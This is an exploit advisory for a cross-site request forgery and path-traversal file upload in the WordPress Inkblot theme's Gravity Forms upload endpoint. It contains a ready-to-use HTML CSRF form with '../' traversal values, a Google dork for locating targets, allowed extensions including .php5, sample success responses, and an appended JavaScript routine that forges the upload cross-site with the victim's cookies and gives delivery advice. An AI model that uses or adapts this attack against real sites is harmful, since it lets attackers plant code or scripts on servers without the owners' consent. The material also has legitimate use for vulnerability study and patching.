KingSkrupellos

WordPress Inkblot Themes 4.9.10 Cross Site Request Forgery

May 21st, 2019
####################################################################

# Exploit Title : WordPress Inkblot Themes 4.9.10 Cross Site Request Forgery
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/05/2019
# Vendor Homepage : wordpress.org - gravityforms.com
# Software Download Link : github.com/mgsisk/inkblot/archive/master.zip
# Software Information Link : wordpress.org/themes/inkblot
# Software Affected Versions : 4.5.2 and 4.9.10 - 4.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:Powered by WordPress with Inkblot
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
WordPress Inkblot Themes is vulnerable to cross-site request forgery: the file upload
handler reached through ?gf_page=upload (the Gravity Forms upload endpoint, which is why
gravityforms.com is listed as a vendor above) accepts a multipart POST without a nonce or
any other check that the logged-in user intended to send it. By persuading an authenticated
user to visit a malicious Web site, a remote attacker can have that user's browser submit
the forged upload. The form_id and gform_unique_id values are used in the temporary file
path without being sanitized, so relative paths such as ../../ place the file outside the
intended upload directory; the successful response below echoes "..\/..\/" in
temp_filename. Because extensions such as .php5, .phtml and .html are accepted, the
attacker ends up with a file of their choosing on the target host: server-side code
execution where the web server maps that extension to PHP, or stored cross-site scripting
from an uploaded HTML page.

The web application does not, or cannot, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted it.
When a web server accepts a request from a client without any mechanism for verifying
that it was intentionally sent, an attacker may be able to trick a client into making an
unintentional request which the server then treats as authentic. This can be done via a
URL, an image load, an XMLHttpRequest, an auto-submitted form, etc., and can result in
exposure of data or unintended code execution.

# CSRF Cross Site Request Forgery Exploit :
****************************************
<html>
<head><title>WordPress Inkblot Themes Input Exploiter</title></head>
<body>

<!-- Posts a multipart upload to the vulnerable handler with relative paths in
     form_id and gform_unique_id; the victim must be logged in to the target. -->
<form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

</body>
</html>

# Directory File Path :
***********************
/_input__kingskrupellos.php5

/_input__[YOURFILENAME].php5

The handler names the temporary file _input__<name> with the accepted extension; with the
../../ prefix it lands two directories above the handler's temporary upload directory, as
the successful response shows.

# Vulnerability Error [ Failed ] :
*******************
{"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

A 500 "Failed to upload file." reply means the handler rejected the upload.

# Vulnerability Response [ Successful ] :
*******************************
{"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

# Allowed File Extensions :
*************************
.html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf

# Example Usage for Windows :
******************************
# Serve the exploit page with the XAMPP Control Panel on your localhost.
# Place it in the htdocs folder of your XAMPP installation.

# 127.0.0.1/wordpressinkblotexploiter.html

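The form above needs the victim to pick a file, because a page on another origin cannot pre-fill an <input type="file">. A script can build the same multipart body itself and post it with the victim's cookies. The following is an added example, not code from this advisory, from the Inkblot theme or from Gravity Forms: the target URL is the advisory's placeholder, the field values are those of the form above, and the file contents, the boundary string and the function names are constructed here for illustration. It also parses the two JSON replies reproduced above, so a tester can tell a rejected upload from one whose temp_filename still carries the ../ prefix.

```javascript
// Added example: not code from the advisory, the Inkblot theme or Gravity Forms.
// Builds the same multipart/form-data POST as the advisory's HTML form, but from
// script, so a victim's browser submits it without having to pick a file, and
// classifies the two JSON replies the advisory reproduces.

const TARGET = 'http://[VULNERABLEWEBSITE]/?gf_page=upload'; // placeholder from the advisory

// Field values copied from the advisory's form.
const FORGED_FIELDS = {
  form_id: '../../../',
  name: 'kingskrupellos.html',
  gform_unique_id: '../../',
  field_id: '',
  gform_submit: 'submit',
};

// Encode the fields plus one file part as multipart/form-data (RFC 7578 framing).
function buildUploadBody(fields, file, boundary) {
  const CRLF = '\r\n';
  let body = '';
  for (const [name, value] of Object.entries(fields)) {
    body += `--${boundary}${CRLF}` +
      `Content-Disposition: form-data; name="${name}"${CRLF}${CRLF}` +
      `${value}${CRLF}`;
  }
  body += `--${boundary}${CRLF}` +
    `Content-Disposition: form-data; name="file"; filename="${file.filename}"${CRLF}` +
    `Content-Type: ${file.type}${CRLF}${CRLF}` +
    `${file.content}${CRLF}` +
    `--${boundary}--${CRLF}`;
  return body;
}

// Interpret the handler's JSON reply. The advisory shows two shapes:
//   {"status":"error","error":{"code":500,"message":"Failed to upload file."}}
//   {"status":"ok","data":{"temp_filename":"..\/..\/_input__x.php5","uploaded_filename":"x.php"}}
// A temp_filename that still contains "../" after JSON decoding means the
// relative path sent in form_id / gform_unique_id reached the file system path.
function classifyResponse(jsonText) {
  let reply;
  try {
    reply = JSON.parse(jsonText);
  } catch (e) {
    return { status: 'unparseable', traversal: false, tempFilename: null };
  }
  if (reply.status !== 'ok' || !reply.data) {
    return { status: 'rejected', traversal: false, tempFilename: null };
  }
  const temp = String(reply.data.temp_filename || '');
  return { status: 'ok', traversal: temp.includes('../'), tempFilename: temp };
}

// Cross-site delivery (browser only). multipart/form-data is a CORS-safelisted
// content type, so no preflight is sent; credentials: 'include' attaches the
// victim's WordPress cookies; mode: 'no-cors' means the attacker page cannot
// read the reply (it is opaque), so classify replies from your own same-origin test.
// The file name matches uploaded_filename in the advisory's successful reply; the
// marker content is constructed here.
function deliverCrossSite(target = TARGET) {
  const boundary = '----csrfboundary' + Date.now();
  const body = buildUploadBody(
    FORGED_FIELDS,
    { filename: 'kingskrupellos.php', type: 'text/plain', content: '<?php echo "csrf-poc"; ?>' },
    boundary
  );
  return fetch(target, {
    method: 'POST',
    mode: 'no-cors',
    credentials: 'include',
    headers: { 'Content-Type': `multipart/form-data; boundary=${boundary}` },
    body,
  });
}
```

Call deliverCrossSite() from the attacker page once the victim is logged in to the target. Two checks before attributing the issue to the theme: confirm that ?gf_page=upload answers at all on the target (it is the Gravity Forms upload handler, which is why gravityforms.com appears as a vendor above), and remember that browsers which default cookies to SameSite=Lax (Chrome 80 and later) will not attach the WordPress session cookie to a cross-site POST unless the cookie was set with SameSite=None; Secure. A written .php5 file only executes where the web server maps that extension to PHP; otherwise the .html case (stored cross-site scripting) is the one to verify.
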
####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################